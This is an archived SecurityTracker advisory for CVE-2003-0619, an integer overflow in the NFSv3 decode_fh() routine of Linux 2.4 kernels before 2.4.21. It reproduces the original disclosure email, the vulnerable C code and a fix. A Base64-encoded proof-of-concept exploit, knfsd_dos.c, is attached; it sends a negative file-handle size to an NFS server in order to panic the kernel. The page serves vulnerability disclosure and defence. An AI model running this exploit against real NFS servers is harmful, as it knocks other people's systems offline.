SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   OS (Linux)  >   Linux Kernel Vendors:   kernel.org
Linux 2.4 Kernel NFSv3 Integer Overflow May Let Remote Users Cause a Kernel Panic
SecurityTracker Alert ID:  1007331
SecurityTracker URL:  http://securitytracker.com/id/1007331
CVE Reference:   CVE-2003-0619   (Links to External Site)
Updated:  Apr 26 2004
Original Entry Date:  Jul 29 2003
Impact:   Denial of service via local system, Denial of service via network
Fix Available:  Yes  Exploit Included:  Yes  
Version(s): prior to 2.4.21
Description:   An unsigned integer overflow was reported in the Linux kernel in an NFSv3 function call. A remote user may be able to cause the system to crash. The specific impact depends on the application or service that uses the vulnerable call.

It is reported that the decode_fh() function in the 'fs/nfsd/nfs3xdr.c' file may permit a remote user to supply XDR data that will cause a negative integer value to be processed by a kernel memcpy call. This will trigger a kernel panic, according to the report.

Some demonstration exploit code is provided in the Source Message [it is Base64 encoded].

Impact:   A remote or local user may be able to cause denial of service conditions on the system.
Solution:   According to the report, this flaw was fixed in version 2.4.21.
Vendor URL:  www.kernel.org/ (Links to External Site)
Cause:   Boundary error

Message History:   This archive entry has one or more follow-up message(s) listed below.
Dec 5 2003 (Conectiva Issues Fix for Conectiva 8) Linux 2.4 Kernel NFSv3 Integer Overflow May Let Remote Users Cause a Kernel Panic
Conectiva added a fix for Conectiva 8.



 Source Message Contents

Subject:  Remote Linux Kernel < 2.4.21 DoS in XDR routine.


---559023410-758783491-1059444170=:12158
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <Pine.GSO.4.44.0307291254332.2559@gere.odin.pdx.edu>


Hello all,

I have discovered a signed/unsigned issue in a routine responsible for
demarshalling XDR data for NFSv3 procedure calls. As far as I can tell,
this bug has existed since NFSv3 support was integrated. It has been
silently fixed in 2.4.21.

The bug is in the decode_fh routine of fs/nfsd/nfs3xdr.c under the kernel
source tree.

Vulnerable code:

static inline u32 *
decode_fh(u32 *p, struct svc_fh *fhp)
{
        int size;
        fh_init(fhp, NFS3_FHSIZE);
        size = ntohl(*p++);
        if (size > NFS3_FHSIZE)
                return NULL;

        memcpy(&fhp->fh_handle.fh_base, p, size);
        fhp->fh_handle.fh_size = size;
        return p + XDR_QUADLEN(size);
}

Where p is a packet of attacker controlled XDR data. If size is made to be
negative, the sanity check is passed and the malicious value is passed to
memcpy. Due to the behavior of the kernel's memcpy, this will cause a very
large copy in kernel space, resulting in an instant kernel panic.

The attached code is a POC of this vulnerability. It requires that the
vulnerable host has an exported directory available to the attacker. This
is probably not the only way to manifest this bug, however.

If you have any questions, please feel free to contact me.

Cheers,

Jared Stanbrough <jareds@pdx.edu>

---559023410-758783491-1059444170=:12158
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="knfsd_dos.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.GSO.4.44.0307281902500.12158@gere.odin.pdx.edu>
Content-Description: 
Content-Disposition: ATTACHMENT; FILENAME="knfsd_dos.c"

LyoNCiAgTGludXggMi40Lngga25mc2Qga2VybmVsIHNpZ25lZC91bnNpZ25l
ZCBkZWNvZGVfZmggRG9TDQogIEF1dGhvcjogamFyZWQgc3RhbmJyb3VnaCA8
amFyZWRzQHBkeC5lZHU+IA0KICBEYXRlOiAwNy8xOS8yMDAzDQogIA0KICBW
dWxuZXJhYmxlIGNvZGU6IChmcy9uZnNkL25mczN4ZHIuYyBsaW5lIDUyLTY0
KQ0KDQogIHN0YXRpYyBpbmxpbmUgdTMyICoNCiAgZGVjb2RlX2ZoKHUzMiAq
cCwgc3RydWN0IHN2Y19maCAqZmhwKQ0KICB7DQogICAgICAgIGludCBzaXpl
Ow0KICAgICAgICBmaF9pbml0KGZocCwgTkZTM19GSFNJWkUpOw0KICAgICAg
ICBzaXplID0gbnRvaGwoKnArKyk7DQogICAgICAgIGlmIChzaXplID4gTkZT
M19GSFNJWkUpDQogICAgICAgICAgICAgICAgcmV0dXJuIE5VTEw7ICAgDQoN
CiAgICAgICAgbWVtY3B5KCZmaHAtPmZoX2hhbmRsZS5maF9iYXNlLCBwLCBz
aXplKTsNCiAgICAgICAgZmhwLT5maF9oYW5kbGUuZmhfc2l6ZSA9IHNpemU7
DQogICAgICAgIHJldHVybiBwICsgWERSX1FVQURMRU4oc2l6ZSk7DQogIH0N
Cg0KICBUaGlzIGNvZGUgaXMgY2FsbGVkIGJ5IHF1aXRlIGEgZmV3IFhEUiBk
ZWNvZGluZyByb3V0aW5lcy4gVGhlIGJlbG93DQogIFBPQyBkZW1vbnN0cmF0
ZXMgdGhlIHZ1bG5lcmFiaWxpdHkgYnkgZW5jb2RpbmcgYSBtYWxpY2lvdXMg
ZmhzaXplDQogIGF0IHRoZSBiZWdpbm5pbmcgb2YgYSBkaXJvcGFyZyB4ZHIg
YXJndW1lbnQuIA0KIA0KICBUbyB0ZXN0IHRoaXMsIHRoZSB2dWxuZXJhYmxl
IGhvc3QgbXVzdCBoYXZlIGFuIGFjY2Vzc2libGUgZXhwb3J0ZWQNCiAgZGly
ZWN0b3J5IHdoaWNoIHdhcyBwcmV2aW91c2x5IG1vdW50ZWQgYnkgdGhlIGF0
dGFja2VyLiBfSE9XRVZFUl8gDQogIGl0IG1heSBiZSBwb3NzaWJsZSB0byB0
cmlnZ2VyIHRoaXMgYnVnIGJ5IHNvbWUgb3RoZXIgbWV0aG9kLg0KDQogIEZp
eDogU2ltcGx5IGNoYW5nZSBzaXplIHRvIGFuIHVuc2lnbmVkIGludCwgb3Ig
Y2hlY2sgZm9yIHNpemUgPCAwLg0KKi8NCg0KI2luY2x1ZGUgPHJwY3N2Yy9u
ZnNfcHJvdC5oPg0KI2luY2x1ZGUgPHJwYy9ycGMuaD4NCiNpbmNsdWRlIDxy
cGMveGRyLmg+DQojaW5jbHVkZSA8bmV0aW5ldC9pbi5oPg0KI2luY2x1ZGUg
PHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCg0KI2Rl
ZmluZSBORlNQUk9HIDEwMDAwMw0KI2RlZmluZSBORlNWRVJTIDMNCiNkZWZp
bmUgTkZTUFJPQ19HRVRBVFRSIDENCg0Kc3RhdGljIHN0cnVjdCBkaXJvcGFy
Z3MgaGVoOw0KDQpib29sX3QgeGRyX2hlaChYRFIgKnhkcnMsIGRpcm9wYXJn
cyAqaGVoKSANCnsNCiAgaW50MzJfdCB3ZXJkID0gLTE7IA0KICByZXR1cm4g
eGRyX2ludDMyX3QoeGRycywgJndlcmQpOw0KfQ0KDQppbnQgbWFpbih2b2lk
KQ0Kew0KICBDTElFTlQgKiBjbGllbnQ7DQogIHN0cnVjdCB0aW1ldmFsIHR2
Ow0KDQogIGNsaWVudCA9IGNsbnRfY3JlYXRlKCJtYXJkdWsiLCBORlNQUk9H
LCBORlNWRVJTLCAidWRwIik7DQogIA0KICBpZihjbGllbnQgPT0gTlVMTCkg
ew0KICAgICAgcGVycm9yKCJjbG50X2NyZWF0ZVxuIik7DQogIH0NCg0KICB0
di50dl9zZWMgPSAzOw0KICB0di50dl91c2VjID0gMDsNCiAgY2xpZW50LT5j
bF9hdXRoID0gYXV0aHVuaXhfY3JlYXRlX2RlZmF1bHQoKTsNCg0KICBjbG50
X2NhbGwoY2xpZW50LCBORlNQUk9DX0dFVEFUVFIsICh4ZHJwcm9jX3QpIHhk
cl9oZWgsIChjaGFyICopJmhlaCwNCiAgICAgICAgICAgICh4ZHJwcm9jX3Qp
IHhkcl92b2lkLCBOVUxMLCB0dik7DQoNCiAgcmV0dXJuIDA7DQp9DQogIA0K
IA0K
---559023410-758783491-1059444170=:12158--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC